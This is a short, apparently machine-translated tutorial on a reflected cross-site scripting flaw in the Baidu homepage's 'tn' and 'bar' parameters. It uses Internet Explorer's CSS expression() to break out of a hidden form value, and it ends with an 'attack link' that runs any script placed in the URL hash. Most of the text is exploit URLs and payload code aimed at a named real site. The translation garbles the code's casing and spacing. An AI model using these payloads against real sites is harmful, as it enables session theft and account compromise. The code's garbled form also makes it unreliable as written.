Take Baidu homepage Once an XSS to do a demonstration, this flaw is because of Baidu homepage TN and bar parameter filter not strict result in parameter type XSS:
Http://www.baidu.com/index.php?tn= "/**/style=xss:expression (Alert (' XSS '));
Http://www.baidu.com/index.php?bar= "/**/style=xss:expression (Alert (' XSS '));
TN and bar two parameters corresponding to the output of the page is two input form values, you can use the "(double quotation marks) closed form values, add CSS Properties cross-site, the page specific output is as follows:
<input type=hidden name=tn value= ""/**/style=xss:expression (Alert (' XSS ')); " >
This vulnerability can only be used under IE, Firefox will be in the URL link parameter "(double quotation mark) to encode% 22, the output of the page parameters will also become% 22, you can not close" (double quotation marks) cross-station. Expression () is a disobedient character, and here you can use a little trick to get rid of the annoying dead loop of expression. Run the code after the # comment for the current URL:
Eval (unescape (LOCATION.HASH.SUBSTR (1)))
Define a value for the method of the Window object and determine the value to run the code once:
(window.r!=1)? Eval (' Window.r=1;eval (unescape (LOCATION.HASH.SUBSTR (1))): 1
Finally get the perfect attack link:
Http://www.baidu.com/index.php?bar= "/**/style=xss:expression ((window.r!=1)? Eval (' Window.r=1;eval (unescape ( LOCATION.HASH.SUBSTR (1))) '): 1); #alert%28%29
A typical parametric cross-site Scripting vulnerability